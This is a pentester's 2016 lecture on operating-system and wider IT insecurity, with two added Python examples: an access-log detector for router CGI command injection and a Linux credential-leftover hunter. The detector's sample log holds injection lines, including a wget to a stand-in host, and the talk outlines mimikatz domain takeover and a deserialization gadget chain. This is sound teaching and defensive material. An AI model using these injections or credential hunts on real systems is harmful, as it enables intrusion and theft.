Operating Systems Security
And Why It (Mostly) Doesn't Matter
Patrick Hof - RedTeam Pentesting GmbH, patrick.hof@redteam-pentesting.de
https://www.redteam-pentesting.de/
Radboud University, Nijmegen, 19 December 2016

Outline:
RedTeam Pentesting
Penetration Tests
We're Doomed
What Now?

RedTeam Pentesting GmbH: OS Security And Why It (Mostly) Doesn't Matter

RedTeam Pentesting, Dates & Facts
Founded in 2004 at RWTH Aachen University
9 penetration testers
Conducting penetration tests world-wide
Specialisation exclusively on penetration tests

Pentest – Introduction
Targets and attacker model defined in a preliminary meeting
Conducted from the attacker's perspective → same methods as the "bad guys"
Individualised search for security vulnerabilities
Detailed documentation

Data Breaches 2016
If you look at the security-related headlines in 2016, we're pretty much doomed
Large data breaches 2016 (just to name a few):
Dec 14th, Yahoo: more than 1B (!) user accounts (from August 2013)
Nov 23rd, AdultFriendFinder: 421M user accounts
Sep 2nd, Dropbox: 68M user accounts (from 2012)
May 17th, LinkedIn: 117M user accounts (from 2012)
and the list goes on...[1]
1: Source: https://www.identityforce.com/blog/2016-data-breaches

Branded Security Vulns
CVE-2016-5195 (Dirty COW)
CVE-2016-0800 (DROWN)
CVE-2016-3714 (ImageTragick)
CVE-2015-0235 (GHOST)
CVE-2014-6271 (Shellshock)
CVE-2014-0160 (Heartbleed)
We even have logos now! Finally, people will understand the severity of the situation!

Security Incidents Wherever You Look
Why do we see so many incidents?
There seem to be more security-related incidents than ever
In our pentests, we can usually achieve what we agreed beforehand should not happen. Why is that?
I tried to find the cheesiest image I could get...

Defense Mechanisms Are Getting More Advanced
IDS/IPS
Traffic analysis up to the application layer
Antivirus
Security appliances combining all of the above
Operating systems security (ASLR, DEP/NX etc.)
2FA
Centralized security, e.g. group policies on Windows
...

Investments in IT Security are Rising
When we started 10 years ago, "pentests" were not widely known
Now, companies are investing more than ever in IT security (search for "Hot Cybersecurity Stocks 2016" on Google, I dare you)
Shouldn't this reduce the number of incidents?

Why so Many Incidents?
Ok, so maybe things are not as bad as I make them look.

Why so Many Incidents?
Theory: Working as a pentester only shows very vulnerable companies; everyone else is secure and therefore doesn't do pentests.
Answer: No, those who do pentests are rather security-aware, otherwise they wouldn't bother.

Why so Many Incidents?
Theory: The media are giving a skewed view on things for the sake of making scary headlines about "the cybers", therefore making it seem worse than it actually is.
"So we have to get very, very tough on cyber and cyberwarfare. It is a, it is a huge problem. I have a son. He's 10 years old. He has computers. He is so good with these computers, it's unbelievable. The security aspect of cyber is very, very tough." – Abraham Lincoln

Why so Many Incidents?
Answer: Might be partly true, but apart from the usual media sensationalism, many hacks are real. We do see a lot of vulnerable systems in our work and we also get feedback from clients about breaches they had that were never reported to anyone.

Why so Many Incidents?
Theory: There is so much money in the security industry that everyone is interested in scaring people into buying as much "security" as possible.
Answer: Partly true, there's a lot of very questionable stuff out there that makes millions in profits, but as I already said: we do see a lot of very insecure systems in our work, and if you look at the recent security research, others do too.

The Real Problems
Some ideas what the real problems could be:
Everything is online these days, or in the process of going online: banking, shopping, social interaction...
IT is more and more prevalent in every company, (almost) nobody works without IT or the Internet
Employees should be able to work from anywhere (and be available 24/7), so remote access is needed, even from private hardware (BYOD)
Things change fast, companies are trying to keep up with the latest trends
There is a huge market for cheap gadgets and the "Internet of Things"

The Real Problems
Complexity breeds bugs, bugs are vulnerabilities waiting to be exploited
Companies add more features instead of securing the ones already available
Attackers are interested in data, not necessarily a root shell

The Real Problems
Malvertising: ad networks currently have a huge malware problem
Content Delivery Networks (CDN): one hack, millions of victims
Hide behind the "big name" when delivering malware
JavaScript bloat
March 2016: the "left-pad fiasco"[1]: 2,486,696 downloads in February alone for a module that left-pads strings!
Again: hack one developer, target loads of applications
1: http://www.haneycodes.net/npm-left-pad-have-we-forgotten-how-to-program/

The Real Problems
More Buzzwords:
Internet of Things (IoT)
The Cloud
Antivirus
Smartphones

Example: Home Routers
9.12.2016: Netgear, 8 models can be exploited like it's '99:
http://<router_IP>/cgi-bin/;COMMAND
(everything after the ';' is handed to a shell by the CGI handler)
This is how I exploited my Linksys WRT54G Wi-Fi router to install Linux, in 2002! Even then, command injections were already a well-known vulnerability.
There are exploit kits used by malvertisers to open up home routers with vulnerabilities like this one.
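The injection shape above is trivial to spot on the wire. As an added example (not part of the talk, and not a tool of the speaker's), here is a detection that runs over web-server or proxy access logs and flags requests that put a shell metacharacter right after /cgi-bin/. The log lines in SAMPLE_LOG are constructed (made-up hosts, addresses and paths) in Common Log Format; one attempt uses $IFS instead of a space and one is double-percent-encoded, because both are seen in practice and a naive "look for a space" check misses them.

```python
"""Detection for the /cgi-bin/;COMMAND injection pattern over web-server
access logs.

Added example, not part of the talk. The access-log lines in SAMPLE_LOG are
constructed (made-up hosts, addresses and paths) in Common Log Format.
"""
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "METHOD PATH PROTO" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: [^"]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Shell metacharacters that start a second command or a substitution.
# A legitimate CGI script name never contains them, so any of them right
# after /cgi-bin/ is the injection shape from the Netgear advisory.
SHELL_META_RE = re.compile(r'[;|&`$\n]')


def decode_path(path: str) -> str:
    """Percent-decode until stable (bounded), so %253B (double-encoded ';')
    is seen as ';' just as the router's CGI layer would eventually see it."""
    previous, current = None, path
    for _ in range(3):
        if current == previous:
            break
        previous, current = current, unquote(current)
    return current


def is_cgi_injection(path: str) -> bool:
    """True if the path component puts a shell metacharacter after /cgi-bin/."""
    decoded = decode_path(path)
    # Query strings are deliberately ignored: ';' is legitimate there in
    # some frameworks, and parameter injection is a separate check.
    path_only = decoded.split('?', 1)[0]
    if '/cgi-bin/' not in path_only:
        return False
    after = path_only.split('/cgi-bin/', 1)[1]
    return SHELL_META_RE.search(after) is not None


def scan_log(lines):
    """Return (client, decoded path) for each request that matches."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if m and is_cgi_injection(m.group('path')):
            hits.append((m.group('host'), decode_path(m.group('path'))))
    return hits


# Constructed sample: three injection attempts (one using $IFS instead of a
# space, one double-encoded), then ordinary traffic that must not fire.
SAMPLE_LOG = [
    '198.51.100.7 - - [09/Dec/2016:10:01:12 +0100] "GET /cgi-bin/;uname$IFS-a HTTP/1.1" 200 512',
    '198.51.100.7 - - [09/Dec/2016:10:01:13 +0100] "GET /cgi-bin/;wget%20http://203.0.113.5/x HTTP/1.1" 200 0',
    '203.0.113.20 - - [09/Dec/2016:10:02:00 +0100] "GET /cgi-bin/%253Bid HTTP/1.1" 404 0',
    '192.0.2.44 - - [09/Dec/2016:10:03:30 +0100] "GET /cgi-bin/status.cgi?page=1 HTTP/1.1" 200 1024',
    '192.0.2.45 - - [09/Dec/2016:10:03:31 +0100] "GET /index.html HTTP/1.1" 200 2048',
    '192.0.2.46 - - [09/Dec/2016:10:04:00 +0100] "GET /search?q=a;b HTTP/1.1" 200 100',
]

if __name__ == '__main__':
    for client, path in scan_log(SAMPLE_LOG):
        print(f'{client} -> {path}')
```

A home router rarely keeps an access log at all, so in practice this check lives on the perimeter proxy or IDS that sees the request, or in a scanner you run against your own devices. The 404 on the double-encoded attempt is still a finding: the attacker is probing, and the next model in the list may decode twice.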

Example: Antivirus
Antivirus software is often indistinguishable from a kernel rootkit
Embeds itself deeply into the system, hooking kernel functions
Check out Tavis Ormandy's work at Google Project Zero: exploits for Symantec and Norton, Avast, Trend Micro...
Recent research (12.12.2016) by Andrew Fasano: McAfee VirusScan for Linux, 10 vulnerabilities that can be chained to achieve remote command execution as root[1]
1: https://nation.state.actor/mcafee.html

Example: Serialization Considered Harmful
Problem: transparently sending objects back and forth blurs the distinction between untrusted client and trusted server for programmers
One of the newer tools (released 2015): ysoserial[1]
Gadget chain as shown on the slide (abridged):
ObjectInputStream.readObject()
AnnotationInvocationHandler.readObject()
[...]
Runtime.getRuntime()
InvokerTransformer.transform()
Method.invoke()
Runtime.exec()
1: https://github.com/frohoff/ysoserial

What Else?
Operating Systems Security:
Mostly post-exploitation, aka: we already got the data, but while we're at it...

Operating Systems Security: Windows
In many cases: once you are part of the domain, it is just a matter of time until you are domain admin
Get local user hashes/tickets from memory
If not already domain admin: access other machines with the credentials/hashes/tickets found until you have a domain admin account
Game over, connect to the domain controller and create for example a golden ticket
mimikatz[1] implements all of this
1: https://github.com/gentilkiwi/mimikatz

Operating Systems Security: Linux
Linux is found mostly on servers
There, you have the usual problem: only few install their patches on time → outdated kernel, glibc etc.
Use local privilege escalation to get root
More fragmented, rather individual how you can get access to more systems
E.g. passwords in the .bash_history, private SSH keys, weak passwords, open shares, config files with credentials...
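The Linux leftovers listed above are the same on nearly every engagement, so the hunt for them is worth automating. As an added example (not the speaker's tooling, and not a published tool), the following walks a directory tree and reports passwords typed on the command line in shell history, private SSH keys (and whether they are passphrase-less or readable by other users) and key = value credentials in config files. The build_sample_home() function creates a constructed home directory in a temp dir with made-up contents so the scan runs offline; on a real engagement you would point hunt() at /home, /root and the application's config directories. The regexes are deliberately a starting set, not a complete one.

```python
"""Hunting the Linux credential leftovers the slide lists: passwords in
.bash_history, private SSH keys (passphrase-less or world-readable) and
config files carrying credentials.

Added example, not the speaker's tooling. build_sample_home() creates a
constructed home directory in a temp dir with made-up contents so that the
scan runs offline.
"""
import re
import stat
import tempfile
from pathlib import Path

# Shell history lines where the secret was typed on the command line
HISTORY_PATTERNS = [
    re.compile(r'\bmysql\b.*\s-p\S+'),                     # mysql -pSecret
    re.compile(r'\bsshpass\s+-p\s*\S+'),                    # sshpass -p Secret
    re.compile(r'\bcurl\b.*\s(?:-u|--user)\s+\S+:\S+'),     # curl -u user:pass
    re.compile(r'(?i)(password|passwd|pwd)\s*[=:]\s*\S+'),  # export DB_PASSWORD=...
]
# key = value style credentials in ini/conf/env/yaml files
CONFIG_PATTERN = re.compile(
    r'(?i)^\s*(?:[a-z_]*)(?:password|passwd|secret|api_key)\s*[=:]\s*\S+')
PRIVATE_KEY_MARKER = re.compile(r'-----BEGIN (?:\w+ )?PRIVATE KEY-----')
HISTORY_FILES = {'.bash_history', '.zsh_history', '.mysql_history'}
CONFIG_SUFFIXES = {'.conf', '.cfg', '.ini', '.env', '.yml', '.yaml'}


def scan_history(path: Path):
    out = []
    for no, line in enumerate(path.read_text(errors='replace').splitlines(), 1):
        if any(p.search(line) for p in HISTORY_PATTERNS):
            out.append(('history-password', str(path), f'line {no}: {line.strip()}'))
    return out


def scan_key(path: Path):
    text = path.read_text(errors='replace')
    if not PRIVATE_KEY_MARKER.search(text):
        return []
    # Old PEM keys carry "Proc-Type: 4,ENCRYPTED" when passphrase-protected.
    # Caveat: the newer OPENSSH format hides the cipher inside the base64
    # body, so for those keys this reports the file but not its protection.
    detail = 'passphrase-protected' if 'ENCRYPTED' in text else 'unencrypted PEM'
    mode = stat.S_IMODE(path.stat().st_mode)
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        detail += f', readable by group/others (mode {mode:04o})'
    return [('private-key', str(path), detail)]


def scan_config(path: Path):
    out = []
    for no, line in enumerate(path.read_text(errors='replace').splitlines(), 1):
        if CONFIG_PATTERN.match(line):
            out.append(('config-credential', str(path), f'line {no}: {line.strip()}'))
    return out


def hunt(root):
    """Walk root and return sorted (kind, path, detail) findings."""
    findings = []
    for p in Path(root).rglob('*'):
        if p.is_symlink() or not p.is_file():
            continue
        if p.name in HISTORY_FILES:
            findings += scan_history(p)
        elif p.parent.name == '.ssh' or p.suffix in ('.pem', '.key'):
            findings += scan_key(p)
        elif p.suffix in CONFIG_SUFFIXES or p.name == '.env':
            findings += scan_config(p)
    return sorted(findings)


def build_sample_home(base) -> Path:
    """Constructed home directory with typical leftovers (all values made up)."""
    home = Path(base) / 'home' / 'deploy'
    (home / '.ssh').mkdir(parents=True)
    (home / 'app').mkdir()
    (home / '.bash_history').write_text(
        'ls -la\n'
        'mysql -u root -pS3cretRoot! shopdb\n'
        'sshpass -p Hunter2 ssh backup@10.0.0.9\n'
        'export DB_PASSWORD=changeme\n'
        'curl -u admin:admin http://intranet/api/status\n'
        'cat /var/log/syslog\n')
    key = home / '.ssh' / 'id_rsa'
    key.write_text('-----BEGIN RSA PRIVATE KEY-----\nMIIEconstructed\n'
                   '-----END RSA PRIVATE KEY-----\n')
    key.chmod(0o644)  # wrong: should be 0600
    enc = home / '.ssh' / 'id_backup'
    enc.write_text('-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n'
                   'DEK-Info: AES-128-CBC,constructed\n\nconstructed\n'
                   '-----END RSA PRIVATE KEY-----\n')
    enc.chmod(0o600)
    (home / 'app' / 'settings.ini').write_text(
        '[database]\nhost = db1\nuser = shop\npassword = "Sh0pSecret"\n')
    (home / 'app' / 'README.md').write_text('password policy: rotate every 90 days\n')
    return home


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        return hunt(build_sample_home(tmp))


if __name__ == '__main__':
    for kind, path, detail in demo():
        print(f'[{kind}] {path}: {detail}')
```

Run as the user whose home you are checking, the same script doubles as a hardening check before an engagement: every history hit is a password to rotate (and a reason to set HISTCONTROL or to stop passing secrets as arguments), every unencrypted or group-readable key is one more system the attacker reaches without any exploit.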

Are We Really Doomed?
We start to see that consumers demand security, but only when it hurts (e.g. ransomware)
Nobody cares if they're part of a botnet, everyone cares if their family photos are encrypted (or for companies: their precious Excel reports)

Are We Really Doomed?
Reduce complexity (KISS) instead of increasing it
Make security part of the development cycle
Patch your systems regularly!
Not everything needs to be connected to the Internet

Questions?
Thank you for listening!